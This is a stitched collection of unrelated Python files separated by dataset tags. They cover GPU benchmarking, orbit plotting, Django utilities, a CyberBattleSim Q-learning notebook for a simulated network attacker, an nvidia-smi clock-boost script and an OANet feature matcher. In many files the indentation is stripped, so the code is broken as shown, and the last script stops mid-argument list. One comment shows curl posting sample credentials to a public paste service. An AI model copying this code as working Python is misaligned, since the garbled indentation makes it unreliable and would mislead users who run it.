dataset = HuggingFaceDataset(encoded_texts, torch.tensor(texts['label'].to_list()))
sampler = SequentialSampler(dataset)
logger.info("n_samples %s", len(dataset))
# performance_schedule = schedule(
# skip_first=10,
# wait=5,
# warmup=1,
# active=3,
# repeat=2
# )
import subprocess as sp
record = {
'bs': list(),
'key': list(),
'mem': list(),
'tol_t': list(),
'avg_t': list(),
}
def get_gpu_memory():
command = "nvidia-smi --query-gpu=memory.used --format=csv"
memory_used_info = sp.check_output(command.split()).decode('ascii').split('\n')[:-1][1:]
memory_used_values = [int(x.split()[0]) for i, x in enumerate(memory_used_info)]
# return np.sum(memory_used_values)
return memory_used_values[-1]
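# NOTE: the model call inside `inference` is synchronous, so these coroutines
# run back-to-back; asyncio is only used to batch-submit the per-batch calls.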
async def inference(key, inputs):
    models[key](**inputs)
for key in model_keys:
with torch.no_grad():
        for batch_size in [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]:
dataloader = DataLoader(
dataset, sampler=sampler, batch_size=batch_size
)
starter, ender = torch.cuda.Event(enable_timing=True), torch.cuda.Event(enable_timing=True)
timings = []
starter.record()
loop = asyncio.new_event_loop()
            tasks = [
                inference(key, inputs) for inputs, _ in dataloader
            ]
loop.run_until_complete(asyncio.wait(tasks))
ender.record()
torch.cuda.synchronize()
loop.close()
# for input, _ in tqdm(dataloader, desc="Measuring"):
# models[key](**input)
curr_time = starter.elapsed_time(ender)
timings.append(curr_time)
# print(dir(cutorch.get_device_properties(device)))
# print(prof.key_averages())
record['bs'].append(batch_size)
record['key'].append(key)
record['mem'].append(get_gpu_memory())
record['tol_t'].append(np.sum(timings))
record['avg_t'].append(np.mean(timings))
logger.info(
"bs %s; key %s; Mem (MiB) %s; total time (ms) %s; avg time (ms) %s",
batch_size,
key,
get_gpu_memory(),
np.sum(timings),
np.mean(timings)
)
# logger.info("bs %s; key %s;\n\n %s \n\n ", batch_size, key, prof.key_averages().table(sort_by="cuda_time_total"))
df = pd.DataFrame(record)
df.to_csv(os.path.join(os.path.dirname(__file__), f"lm_throughput_{task_name}.csv")) | nilq/baby-python | python |
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
import math
import matplotlib.animation as animation
import sys
# https://towardsdatascience.com/modelling-the-three-body-problem-in-classical-mechanics-using-python-9dc270ad7767
# https://evgenii.com/blog/two-body-problem-simulator/
animate = False
trail = False
previous = 0
def plotData(x1data,x2data,y1data,y2data, z1data, z2data):
global animate
fig = plt.figure()
ax = plt.axes(projection='3d')
if animate:
firstBodyTrail, = ax.plot(x1data, y1data, z1data,'blue',label="body1(t)")
secondBodyTrail, = ax.plot(x2data, y2data, z2data, '#f5a60a',label="body2(t)")
firstBody, = ax.plot(x1data, y1data, z1data,'blue', marker="o")
secondBody, = ax.plot(x2data, y2data, z2data, '#f5a60a',marker="o")
ax.legend()
def updateAnimation(num):
global previous, trail
if num<len(x1data):
firstBodyTrail.set_data(x1data[previous:num], y1data[previous:num])
firstBodyTrail.set_3d_properties(z1data[previous:num])
                firstBody.set_data([x1data[num]], [y1data[num]])
                firstBody.set_3d_properties([z1data[num]])
                secondBodyTrail.set_data(x2data[previous:num], y2data[previous:num])
                secondBodyTrail.set_3d_properties(z2data[previous:num])
                secondBody.set_data([x2data[num]], [y2data[num]])
                secondBody.set_3d_properties([z2data[num]])
# Trail
if trail:
if (num - previous)<260 and num > 250:
previous = previous + 1
#secondBody.set_color('#9944'+"%02x"%((0x55+num)%0xFF))
return firstBodyTrail, secondBodyTrail,
anim = animation.FuncAnimation(fig,updateAnimation, interval=1,blit=False)
else:
ax.scatter(x1data, y1data, z1data, label="x1(t)")
ax.scatter(x2data, y2data, z2data, label="x2(t)")
ax.legend()
plt.show()
def calculateTrajectories(t, m1, m2, r, R):
# Data for a three-dimensional line
x1data = np.zeros((len(t)))
y1data = np.zeros((len(t)))
z1data = np.zeros((len(t)))
x2data = np.zeros((len(t)))
y2data = np.zeros((len(t)))
z2data = np.zeros((len(t)))
m1 = float(m1)
m2 = float(m2)
M = m1 + m2
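    # Recover each body's position from the centre-of-mass vector R and the
    # relative vector r:  x1 = R + (m2/M) r,  x2 = R - (m1/M) r.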
for i in range(len(t)):
#print(r[i][0])
x1data[i] = float(R[i][0]) + m2/M * float(r[i][0])
y1data[i] = float(R[i][1]) + m2/M * float(r[i][1])
z1data[i] = float(R[i][2]) + m2/M * float(r[i][2])
x2data[i] = float(R[i][0]) - m1/M * float(r[i][0])
y2data[i] = float(R[i][1]) - m1/M * float(r[i][1])
z2data[i] = float(R[i][2]) - m1/M * float(r[i][2])
#print("%-4d %-10s %-10s %-10s %-10s %-10s %-10s"%(i, x1data[i], x2data[i], y1data[i], y2data[i], z1data[i], z2data[i]))
plotData(x1data,x2data,y1data,y2data,z1data,z2data)
if __name__ == "__main__":
print(sys.argv)
if len(sys.argv) == 2:
if sys.argv[1] == "-animate":
animate = True
elif sys.argv[1] == "-animatetrail":
animate = True
trail = True
f = open("data.out","r")
data = f.readlines()
f.close()
if data[0][0:2] == "m1" and data[1][0:2] == "m2" and data[2][0:1] == "t" and data[3][0:2] == "rx" and data[4][0:2] == "ry" and data[5][0:2] == "rz" and data[6][0:2] == "Rx" and data[7][0:2] == "Ry" and data[8][0:2] == "Rz":
m1 = data[0].split(" ")[2]
m2 = data[1].split(" ")[2]
t = data[2].split(" ")[2:]
rx = data[3].split(" ")[2:]
ry = data[4].split(" ")[2:]
rz = data[5].split(" ")[2:]
Rx = data[6].split(" ")[2:]
Ry = data[7].split(" ")[2:]
Rz = data[8].split(" ")[2:]
r = [list(a) for a in zip(rx,ry,rz)]
R = [list(a) for a in zip(Rx,Ry,Rz)]
calculateTrajectories(t, m1, m2, r, R)
elif data[0][0:2] == "m1" and data[1][0:2] == "m2" and data[2][0:1] == "t" and data[3][0:2] == "x1" and data[4][0:2] == "y1" and data[5][0:2] == "z1" and data[6][0:2] == "x2" and data[7][0:2] == "y2" and data[8][0:2] == "z2":
m1 = data[0].split(" ")[2]
m2 = data[1].split(" ")[2]
t = data[2].split(" ")[2:]
x1 = data[3].split(" ")[2:]
y1 = data[4].split(" ")[2:]
z1 = data[5].split(" ")[2:]
x2 = data[6].split(" ")[2:]
y2 = data[7].split(" ")[2:]
z2 = data[8].split(" ")[2:]
x1data = np.zeros((len(t)))
y1data = np.zeros((len(t)))
z1data = np.zeros((len(t)))
x2data = np.zeros((len(t)))
y2data = np.zeros((len(t)))
z2data = np.zeros((len(t)))
for idx in range(len(t)):
x1data[idx] = float(x1[idx])
y1data[idx] = float(y1[idx])
z1data[idx] = float(z1[idx])
x2data[idx] = float(x2[idx])
y2data[idx] = float(y2[idx])
z2data[idx] = float(z2[idx])
plotData(x1data,x2data,y1data,y2data,z1data,z2data)
| nilq/baby-python | python |
__author__ = 'anthonymendoza'
from django.db.models import Q, QuerySet
from rest_framework.response import Response
from rest_framework import status
def dynamic_field_lookups(query_params):
Qr = None
    for filter_by, filter_value in query_params.items():
filter_by = "date__gte" if filter_by == "start_date" else filter_by
filter_by = "date__lte" if filter_by == "end_date" else filter_by
if filter_by == 'dam_id':
q = Q(**{"%s__iexact" % filter_by: filter_value})
else:
q = Q(**{"%s" % filter_by: filter_value})
if Qr:
Qr = Qr & q
else:
Qr = q
return Qr
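# Example (hypothetical model/view names): filter a queryset with the combined Q object:
#   Reading.objects.filter(dynamic_field_lookups(request.query_params))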
| nilq/baby-python | python |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Tabular Q-learning agent (notebook)
This notebook can be run directly from VSCode; to generate a
traditional Jupyter Notebook to open in your browser
you can run the VSCode command `Export Current Python File As Jupyter Notebook`.
"""
# pylint: disable=invalid-name
# %%
import sys
import logging
from typing import cast
import gym
import numpy as np
import matplotlib.pyplot as plt
from cyberbattle.agents.baseline.learner import TrainedLearner
import cyberbattle.agents.baseline.plotting as p
import cyberbattle.agents.baseline.agent_wrapper as w
import cyberbattle.agents.baseline.agent_tabularqlearning as a
from cyberbattle.agents.baseline.agent_wrapper import Verbosity
import cyberbattle.agents.baseline.learner as learner
from cyberbattle._env.cyberbattle_env import AttackerGoal
logging.basicConfig(stream=sys.stdout, level=logging.ERROR, format="%(levelname)s: %(message)s")
# %%
# Benchmark parameters:
# Parameters from DeepDoubleQ paper
# - learning_rate = 0.00025
# - linear epsilon decay
# - gamma = 0.99
# Eliminated gamma_values
# 0.0,
# 0.0015, # too small
# 0.15, # too big
# 0.25, # too big
# 0.35, # too big
#
# NOTE: Given the relatively low number of training episodes (50),
# a high learning rate of .99 gives better results
# than a lower learning rate of 0.25 (i.e. maximal rewards are reached faster on average).
# Ideally we should decay the learning rate just like gamma and train over a
# much larger number of episodes
cyberbattlechain_10 = gym.make('CyberBattleChain-v0', size=10, attacker_goal=AttackerGoal(own_atleast_percent=1.0))
ep = w.EnvironmentBounds.of_identifiers(
maximum_node_count=12,
maximum_total_credentials=12,
identifiers=cyberbattlechain_10.identifiers
)
iteration_count = 9000
training_episode_count = 5
eval_episode_count = 5
gamma_sweep = [
0.015, # about right
]
def qlearning_run(gamma, gym_env):
"""Execute one run of the q-learning algorithm for the
specified gamma value"""
return learner.epsilon_greedy_search(
gym_env,
ep,
a.QTabularLearner(ep, gamma=gamma, learning_rate=0.90, exploit_percentile=100),
episode_count=training_episode_count,
iteration_count=iteration_count,
epsilon=0.90,
render=False,
epsilon_multdecay=0.75, # 0.999,
epsilon_minimum=0.01,
verbosity=Verbosity.Quiet,
title="Q-learning"
)
# %%
# Run Q-learning with gamma-sweep
qlearning_results = [qlearning_run(gamma, cyberbattlechain_10) for gamma in gamma_sweep]
qlearning_bestrun_10 = qlearning_results[0]
# %%
p.new_plot_loss()
for results in qlearning_results:
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qsource.all_episodes, 'Q_source', results['title'])
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qattack.all_episodes, 'Q_attack', results['title'])
plt.legend(loc="upper right")
plt.show()
# %% Plot episode length
p.plot_episodes_length(qlearning_results)
# %%
nolearning_results = learner.epsilon_greedy_search(
cyberbattlechain_10,
ep,
learner=a.QTabularLearner(ep, trained=qlearning_bestrun_10['learner'],
gamma=0.0, learning_rate=0.0, exploit_percentile=100),
episode_count=eval_episode_count,
iteration_count=iteration_count,
epsilon=0.30, # 0.35,
render=False,
title="Exploiting Q-matrix",
verbosity=Verbosity.Quiet
)
# %%
randomlearning_results = learner.epsilon_greedy_search(
cyberbattlechain_10,
ep,
learner=a.QTabularLearner(ep, trained=qlearning_bestrun_10['learner'],
gamma=0.0, learning_rate=0.0, exploit_percentile=100),
episode_count=eval_episode_count,
iteration_count=iteration_count,
epsilon=1.0, # purely random
render=False,
verbosity=Verbosity.Quiet,
title="Random search"
)
# %%
# Plot averaged cumulative rewards for Q-learning vs Random vs Q-Exploit
all_runs = [*qlearning_results,
randomlearning_results,
nolearning_results
]
Q_source_10 = cast(a.QTabularLearner, qlearning_bestrun_10['learner']).qsource
Q_attack_10 = cast(a.QTabularLearner, qlearning_bestrun_10['learner']).qattack
p.plot_averaged_cummulative_rewards(
all_runs=all_runs,
title=f'Benchmark -- max_nodes={ep.maximum_node_count}, episodes={eval_episode_count},\n'
f'dimension={Q_source_10.state_space.flat_size()}x{Q_source_10.action_space.flat_size()}, '
f'{Q_attack_10.state_space.flat_size()}x{Q_attack_10.action_space.flat_size()}\n'
f'Q1={[f.name() for f in Q_source_10.state_space.feature_selection]} '
f'-> {[f.name() for f in Q_source_10.action_space.feature_selection]})\n'
f"Q2={[f.name() for f in Q_attack_10.state_space.feature_selection]} -> 'action'")
# %%
# plot cumulative rewards for all episodes
p.plot_all_episodes(qlearning_results[0])
# %%
# Plot the Q-matrices
# %%
# Print non-zero coordinate in the Q matrix Q_source
i = np.where(Q_source_10.qm)
q = Q_source_10.qm[i]
list(zip(np.array([Q_source_10.state_space.pretty_print(i) for i in i[0]]),
np.array([Q_source_10.action_space.pretty_print(i) for i in i[1]]), q))
# %%
# Print non-zero coordinate in the Q matrix Q_attack
i2 = np.where(Q_attack_10.qm)
q2 = Q_attack_10.qm[i2]
list(zip([Q_attack_10.state_space.pretty_print(i) for i in i2[0]],
[Q_attack_10.action_space.pretty_print(i) for i in i2[1]], q2))
##################################################
# %% [markdown]
# ## Transfer learning from size 4 to size 10
# Exploiting Q-matrix learned from a different network.
# %%
# Train Q-matrix on CyberBattle network of size 4
cyberbattlechain_4 = gym.make('CyberBattleChain-v0', size=4,
attacker_goal=AttackerGoal(own_atleast_percent=1.0)
)
qlearning_bestrun_4 = qlearning_run(0.015, gym_env=cyberbattlechain_4)
def stop_learning(trained_learner):
return TrainedLearner(
learner=a.QTabularLearner(
ep,
gamma=0.0,
learning_rate=0.0,
exploit_percentile=0,
trained=trained_learner['learner']
),
title=trained_learner['title'],
trained_on=trained_learner['trained_on'],
all_episodes_rewards=trained_learner['all_episodes_rewards'],
all_episodes_availability=trained_learner['all_episodes_availability']
)
learner.transfer_learning_evaluation(
environment_properties=ep,
trained_learner=stop_learning(qlearning_bestrun_4),
eval_env=cyberbattlechain_10,
eval_epsilon=0.5, # alternate with exploration to help generalization to bigger network
eval_episode_count=eval_episode_count,
iteration_count=iteration_count
)
learner.transfer_learning_evaluation(
environment_properties=ep,
trained_learner=stop_learning(qlearning_bestrun_10),
eval_env=cyberbattlechain_4,
eval_epsilon=0.5,
eval_episode_count=eval_episode_count,
iteration_count=iteration_count
)
# %%
| nilq/baby-python | python |
# The init module for all CRUD in bash
import uuid
import re
from datetime import datetime
from app.model.Bash import Bash
from random import randint
from app.utils.helpers import (
md5,
dell,
get_trace,
gen_hash,
check_password,
generate_key
)
from app.utils.save_bash import save_bash
from app.utils.get_bash import (
get_bash,
get_all_publics_bash,
get_all_private_bash,
get_content_by_key,
find_b4sh,
count_all
)
from app.utils.update_bash import (
update_bash,
up_vote,
down_vote
)
from app.utils.delete_bash import delete_bash
# Example of a valid bash object
# {
# "bash_id": "1234",
# "key": "123:sad",
# "hash": "sadoisankjcn2798382hnkjsacndskjcndsccdsc",
# "title": "A simple echo",
# "author": "d4rk3r",
# "description": "This is a test of the echo command",
# "content": "echo 'test'",
# "stats": {
# "used_count": 3,
# "updated_count": 1,
# "up_vote": 17,
# "down_vote": 3,
# },
# "history": [],
# "date": "2020-04-11 04:47:09"
# }
# for some long commands, we can save them on termbin:
# curl -d "username=mkyong&password=abc" termbin.com:9999 --output -
| nilq/baby-python | python |
import csv
from clint.textui import progress
from django.core.management.base import BaseCommand
from shapes.models import MaterialShape
from bsdfs.models import ShapeBsdfLabel_wd
class Command(BaseCommand):
args = ''
help = 'Helper to export CSV data'
def handle(self, *args, **options):
print 'Fetching data...'
qset = MaterialShape.objects.filter(
correct=True,
bsdf_wd__color_correct=True,
bsdf_wd__gloss_correct=True,
bsdf_wd__init_method='KR',
photo__scene_category_correct_score__gt=0,
)
shapes = qset.values_list(
'id',
'photo__scene_category__name',
'photo__scene_category_correct_score',
'substance__name',
'name__name',
'planar',
'bsdf_wd',
)
bsdfs = ShapeBsdfLabel_wd.objects.in_bulk(
qset.values_list('bsdf_wd', flat=True)
)
filename = args[0] if len(args) >= 1 else 'out.csv'
print 'Writing data to %s...' % filename
with open(filename, 'wb') as f:
writer = csv.writer(f)
writer.writerow([
'shape_id',
'scene',
'scene_correct_score',
'material_name',
'object_name',
'planar',
'bsdf_wd_id',
'rho_d_r',
'rho_d_g',
'rho_d_b',
'rho_s_r',
'rho_s_g',
'rho_s_b',
'alpha',
'colored_reflection',
'color_correct_score',
'gloss_correct_score',
])
for shape in progress.bar(shapes):
b = bsdfs[shape[6]]
rho = b.rho()
writer.writerow(
list(shape) +
list(rho[0]) +
list(rho[1]) +
[b.alpha(), b.metallic, b.color_correct_score, b.gloss_correct_score]
)
| nilq/baby-python | python |
import os
import shutil
import typing
from ConfigSpaceNNI import ConfigurationSpace
from smac.configspace import pcs_new as pcs
class OutputWriter(object):
"""Writing scenario to file."""
def __init__(self):
pass
def write_scenario_file(self, scenario):
"""Write scenario to a file (format is compatible with input_reader).
Will overwrite if file exists. If you have arguments that need special
parsing when saving, specify so in the _parse_argument-function.
        Creates output-dir if necessary.
Parameters
----------
scenario: Scenario
Scenario to be written to file
Returns
-------
status: False or None
False indicates that writing process failed
"""
if scenario.output_dir_for_this_run is None or scenario.output_dir_for_this_run == "":
scenario.logger.info("No output directory for scenario logging "
"specified -- scenario will not be logged.")
return False
# Create output-dir if necessary
if not os.path.isdir(scenario.output_dir_for_this_run):
scenario.logger.debug("Output directory does not exist! Will be "
"created.")
try:
os.makedirs(scenario.output_dir_for_this_run)
except OSError:
raise OSError("Could not make output directory: "
"{}.".format(scenario.output_dir_for_this_run))
# options_dest2name maps scenario._arguments from dest -> name
options_dest2name = {(scenario._arguments[v]['dest'] if
scenario._arguments[v]['dest'] else v) : v for v in scenario._arguments}
# Write all options into "output_dir/scenario.txt"
path = os.path.join(scenario.output_dir_for_this_run, "scenario.txt")
scenario.logger.debug("Writing scenario-file to {}.".format(path))
with open(path, 'w') as fh:
for key in options_dest2name:
new_value = self._parse_argument(scenario, key, getattr(scenario, key))
if new_value is not None:
fh.write("{} = {}\n".format(options_dest2name[key], new_value))
def _parse_argument(self, scenario, key: str, value):
"""Some values of the scenario-file need to be changed upon writing,
such as the 'ta' (target algorithm), due to it's callback. Also,
the configspace, features, train_inst- and test-inst-lists are saved
to output_dir, if they exist.
        Parameters
        ----------
        scenario: Scenario
            Scenario-file to be written
        key: string
            Name of the attribute in scenario-file
        value: Any
            Corresponding attribute
        Returns
        -------
        new value: string
            The altered value, to be written to file
        Side effects
        ------------
- copies files pcs_fn, train_inst_fn, test_inst_fn and feature_fn to
output if possible, creates the files from attributes otherwise
"""
if key in ['pcs_fn', 'train_inst_fn', 'test_inst_fn', 'feature_fn']:
# Copy if file exists, else write to new file
if value is not None and os.path.isfile(value):
try:
return shutil.copy(value, scenario.output_dir_for_this_run)
except shutil.SameFileError:
return value # File is already in output_dir
elif key == 'pcs_fn' and scenario.cs is not None:
new_path = os.path.join(scenario.output_dir_for_this_run, "configspace.pcs")
self.write_pcs_file(scenario.cs, new_path)
elif key == 'train_inst_fn' and scenario.train_insts != [None]:
new_path = os.path.join(scenario.output_dir_for_this_run, 'train_insts.txt')
self.write_inst_file(scenario.train_insts, new_path)
elif key == 'test_inst_fn' and scenario.test_insts != [None]:
new_path = os.path.join(scenario.output_dir_for_this_run, 'test_insts.txt')
self.write_inst_file(scenario.test_insts, new_path)
elif key == 'feature_fn' and scenario.feature_dict != {}:
new_path = os.path.join(scenario.output_dir_for_this_run, 'features.txt')
self.write_inst_features_file(scenario.n_features,
scenario.feature_dict, new_path)
else:
return None
# New value -> new path
return new_path
elif key == 'ta' and value is not None:
# Reversing the callback on 'ta' (shlex.split)
return " ".join(value)
elif key in ['train_insts', 'test_insts', 'cs', 'feature_dict']:
# No need to log, recreated from files
return None
else:
return value
def write_inst_file(self, insts: typing.List[str], fn: str):
"""Writes instance-list to file.
Parameters
----------
insts: list<string>
Instance list to be written
fn: string
Output path
"""
with open(fn, 'w') as fh:
fh.write("\n".join(insts))
def write_inst_features_file(self, n_features: int, feat_dict, fn: str):
"""Writes features to file.
Parameters
----------
n_features: int
Number of features
feat_dict: dict
Features to be written
fn: string
File name of instance feature file
"""
header = "Instance, " + ", ".join(
["feature"+str(i) for i in range(n_features)]) + "\n"
body = [", ".join([inst] + [str(f) for f in feat_dict[inst]]) + "\n"
for inst in feat_dict]
with open(fn, 'w') as fh:
fh.write(header + "".join(body))
def write_pcs_file(self, cs: ConfigurationSpace, fn: str):
"""Writing ConfigSpace to file.
Parameters
----------
cs: ConfigurationSpace
Config-space to be written
fn: string
Output-file-path
"""
with open(fn, 'w') as fh:
fh.write(pcs.write(cs))
| nilq/baby-python | python |
# Generated by Django 3.2.8 on 2022-01-17 16:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cause',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cause_id', models.TextField(max_length=200, verbose_name='Cause ID')),
('label', models.TextField(max_length=200, verbose_name='Cause Label')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Cause Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Cause Updated')),
('tickets', models.IntegerField(blank=True, default=0, null=True, verbose_name='Ticket Count')),
],
),
]
| nilq/baby-python | python |
import os
import glob
import pandas as pd
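# Concatenate every semicolon-separated *.CSV file in the working directory into Combined.csv.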
results = pd.DataFrame()
for counter, current_file in enumerate(glob.glob("*.CSV")):
namedf = pd.read_csv(current_file, header=None, sep=";")
# print(namedf)
results = pd.concat([results, namedf])
results.to_csv('Combined.csv', index=None, sep=",")
# extension = 'CSV'
# all_filenames = [i for i in glob.glob('*.{}'.format(extension))]
# #combine all files in the list
# combined_csv = pd.concat([pd.read_csv(f, sep=';') for f in all_filenames ])
# #export to csv
# print(combined_csv.head())
# # combined_csv.to_csv( "combined_raw.csv", index=False, encoding='utf-8-sig') | nilq/baby-python | python |
from django.conf.urls import url
from django.contrib.auth.decorators import login_required, permission_required
from . import views
urlpatterns = [
url(r'^record_history/(?P<account_id>\d+)/$', login_required(views.RecordHistoryView.as_view()), name = 'record_history'),
url(r'^account_list/(?P<trade_type>\w+)/$', login_required(views.AccountListView.as_view()), name = 'account_list'),
url(r'^account_history/(?P<account_id>\d+)/$', login_required(views.AccountHistoryView.as_view()), name = 'account_history'),
url(r'^account_history/(?P<trade_type>\w+)/$', login_required(views.AccountHistoryView.as_view()), name = 'account_histories'),
url(r'^rebalance_list/$', login_required(views.RebalanceListView.as_view()), name = 'rebalance_list'),
url(r'^rebalance_history/(?P<pair_id>\d+)/$', login_required(views.RebalanceHistoryView.as_view()), name = 'rebalance_history'),
url(r'^rebalance_history/$', login_required(views.RebalanceHistoryView.as_view()), name = 'rebalance_histories'),
] | nilq/baby-python | python |
a = input('Type something: ')
print('Is it lowercase?', a.islower())
print('Is it uppercase?', a.isupper())
print('Is it a number?', a.isnumeric())
print('Is it a letter?', a.isalpha())
| nilq/baby-python | python |
from gym_brt.envs.reinforcementlearning_extensions.rl_reward_functions import (
swing_up_reward,
balance_reward
)
from gym_brt.envs.qube_balance_env import (
QubeBalanceEnv,
)
from gym_brt.envs.qube_swingup_env import (
QubeSwingupEnv,
)
from gym_brt.envs.reinforcementlearning_extensions.rl_gym_classes import (
QubeBeginUpEnv,
QubeBeginDownEnv,
RandomStartEnv,
NoisyEnv,
convert_state,
convert_state_back
)
from gym.envs.registration import register
register(
id='QubeBeginDownEnv-v1',
entry_point='gym_brt.envs:QubeBeginDownEnv',
)
register(
id='QubeSwingupEnv-v1',
entry_point='gym_brt.envs:QubeSwingupEnv',
)
register(
id='QubeBeginUpEnv-v1',
entry_point='gym_brt.envs:QubeBeginUpEnv',
)
register(
id='QubeNoisyEnv-v1',
entry_point='gym_brt.envs:NoisyEnv',
)
register(
id='QubeRandomStartEnv-v1',
entry_point='gym_brt.envs:RandomStartEnv',
) | nilq/baby-python | python |
#!/usr/bin/env python
# coding=UTF-8
#The first line allows this script to be executable
import os
import sys
import operator
from termcolor import colored
def boost_mode():
    print colored('Warning: some features may only be available on Titan-series GPUs; nvidia-smi will tell you which ones you can use', 'red', attrs=['bold'])
gpu_clock = str(raw_input("Enter your maximum GPU clock in mhz (e.g. 1124): "))
mem_clock = str(raw_input("Enter your maximum memory clock in mhz (e.g. 960): "))
os.system('nvidia-smi -pm 1')
os.system('nvidia-smi -e 1')
cmd_String = 'nvidia-smi -ac %s,%s' % (mem_clock,gpu_clock)
os.system(cmd_String)
os.system('nvidia-smi --auto-boost-permission=0')
os.system('nvidia-smi --auto-boost-default=1')
    print colored('[*] Clock set to %s mhz GPU, %s mhz memory' % (gpu_clock, mem_clock), 'yellow', attrs=['bold'])
    return
def monitor_systems():
cmd_String = "gnome-terminal -e 'bash -c \"nvidia-smi dmon; exec bash\"'"
os.system(cmd_String)
cmd_String = "gnome-terminal -e 'bash -c \"nvidia-smi stats; exec bash\"'"
os.system(cmd_String)
print colored('[*] All monitoring modes enabled','yellow',attrs=['bold'])
return
def main():
print colored('MAIN MENU','cyan',attrs=['bold'])
opt_List = [
'\n\t#0. Exit Program',
'#1. Set my video card to full constant-boost mode',
'#2. Activate all monitoring systems'
]
print ("\n\t".join(opt_List))
    opt_Choice = str(raw_input("Enter an OPTION: "))
if opt_Choice == "0":
exit(0)
elif opt_Choice == "1":
os.system('clear')
boost_mode()
main()
elif opt_Choice == "2":
os.system('clear')
monitor_systems()
main()
main()
| nilq/baby-python | python |
import torch
import numpy as np
import argparse
import os
import glob
from tqdm import tqdm
from collections import namedtuple
import sys
sys.path.append('../core')
from oan import OANet
from io_util import read_keypoints, read_descriptors, write_matches
class NNMatcher(object):
"""docstring for NNMatcher"""
def __init__(self, ):
super(NNMatcher, self).__init__()
def run(self, nkpts, descs):
# pts1, pts2: N*2 GPU torch tensor
# desc1, desc2: N*C GPU torch tensor
# corr: N*4
# sides: N*2
# corr_idx: N*2
pts1, pts2, desc1, desc2 = nkpts[0], nkpts[1], descs[0], descs[1]
d1, d2 = (desc1**2).sum(1), (desc2**2).sum(1)
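        # pairwise Euclidean distances via ||a - b||^2 = ||a||^2 + ||b||^2 - 2*a.b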
distmat = (d1.unsqueeze(1) + d2.unsqueeze(0) - 2*torch.matmul(desc1, desc2.transpose(0,1))).sqrt()
dist_vals, nn_idx1 = torch.topk(distmat, k=2, dim=1, largest=False)
nn_idx1 = nn_idx1[:,0]
_, nn_idx2 = torch.topk(distmat, k=1, dim=0, largest=False)
        nn_idx2 = nn_idx2.squeeze()
mutual_nearest = (nn_idx2[nn_idx1] == torch.arange(nn_idx1.shape[0]).cuda())
ratio_test = dist_vals[:,0] / dist_vals[:,1].clamp(min=1e-15)
pts2_match = pts2[nn_idx1, :]
corr = torch.cat([pts1, pts2_match], dim=-1)
corr_idx = torch.cat([torch.arange(nn_idx1.shape[0]).unsqueeze(-1), nn_idx1.unsqueeze(-1).cpu()], dim=-1)
sides = torch.cat([ratio_test.unsqueeze(1), mutual_nearest.float().unsqueeze(1)], dim=1)
return corr, sides, corr_idx
def infer(self, kpt_list, desc_list):
nkpts = [torch.from_numpy(i[:,:2].astype(np.float32)).cuda() for i in kpt_list]
descs = [torch.from_numpy(desc.astype(np.float32)).cuda() for desc in desc_list]
corr, sides, corr_idx = self.run(nkpts, descs)
inlier_idx = np.where(sides[:,1].cpu().numpy())
matches = corr_idx[inlier_idx[0], :].numpy().astype('int32')
corr0 = kpt_list[0][matches[:, 0]]
corr1 = kpt_list[1][matches[:, 1]]
return matches, corr0, corr1
class LearnedMatcher(object):
def __init__(self, model_path, inlier_threshold=0, use_ratio=2, use_mutual=2):
self.default_config = {}
self.default_config['net_channels'] = 128
self.default_config['net_depth'] = 12
self.default_config['clusters'] = 500
self.default_config['use_ratio'] = use_ratio
self.default_config['use_mutual'] = use_mutual
self.default_config['iter_num'] = 1
self.default_config['inlier_threshold'] = inlier_threshold
self.default_config = namedtuple("Config", self.default_config.keys())(*self.default_config.values())
self.model = OANet(self.default_config)
print('load model from ' +model_path)
checkpoint = torch.load(model_path)
self.model.load_state_dict(checkpoint['state_dict'])
self.model.cuda()
self.model.eval()
self.nn_matcher = NNMatcher()
def normalize_kpts(self, kpts):
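        # Hartley-style normalization: translate the keypoints to their centroid
        # and scale so the mean distance from the origin becomes sqrt(2).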
x_mean = np.mean(kpts, axis=0)
dist = kpts - x_mean
meandist = np.sqrt((dist**2).sum(axis=1)).mean()
scale = np.sqrt(2) / meandist
T = np.zeros([3,3])
T[0,0], T[1,1], T[2,2] = scale, scale, 1
T[0,2], T[1,2] = -scale*x_mean[0], -scale*x_mean[1]
nkpts = kpts * np.asarray([T[0, 0], T[1, 1]]) + np.array([T[0, 2], T[1, 2]])
return nkpts
def infer(self, kpt_list, desc_list):
with torch.no_grad():
nkpts = [torch.from_numpy(self.normalize_kpts(i[:,:2]).astype(np.float32)).cuda() for i in kpt_list]
descs = [torch.from_numpy(desc.astype(np.float32)).cuda() for desc in desc_list]
corr, sides, corr_idx = self.nn_matcher.run(nkpts, descs)
corr, sides = corr.unsqueeze(0).unsqueeze(0), sides.unsqueeze(0)
data = {}
data['xs'] = corr
            # currently supported modes:
if self.default_config.use_ratio==2 and self.default_config.use_mutual==2:
data['sides'] = sides
elif self.default_config.use_ratio==0 and self.default_config.use_mutual==1:
mutual = sides[0,:,1]>0
data['xs'] = corr[:,:,mutual,:]
data['sides'] = []
corr_idx = corr_idx[mutual,:]
elif self.default_config.use_ratio==1 and self.default_config.use_mutual==0:
ratio = sides[0,:,0] < 0.8
data['xs'] = corr[:,:,ratio,:]
data['sides'] = []
corr_idx = corr_idx[ratio,:]
elif self.default_config.use_ratio==1 and self.default_config.use_mutual==1:
mask = (sides[0,:,0] < 0.8) & (sides[0,:,1]>0)
data['xs'] = corr[:,:,mask,:]
data['sides'] = []
corr_idx = corr_idx[mask,:]
elif self.default_config.use_ratio==0 and self.default_config.use_mutual==0:
data['sides'] = []
else:
raise NotImplementedError
y_hat, e_hat = self.model(data)
y = y_hat[-1][0, :].cpu().numpy()
inlier_idx = np.where(y > self.default_config.inlier_threshold)
matches = corr_idx[inlier_idx[0], :].numpy().astype('int32')
corr0 = kpt_list[0][matches[:, 0]]
corr1 = kpt_list[1][matches[:, 1]]
return matches, corr0, corr1
def str2bool(v):
return v.lower() in ("true", "1")
# Parse command line arguments.
parser = argparse.ArgumentParser(description='extract sift.')
parser.add_argument('--input_path', type=str, default='/home/liao/zjh/datasets/',
help='Image directory or movie file or "camera" (for webcam).')
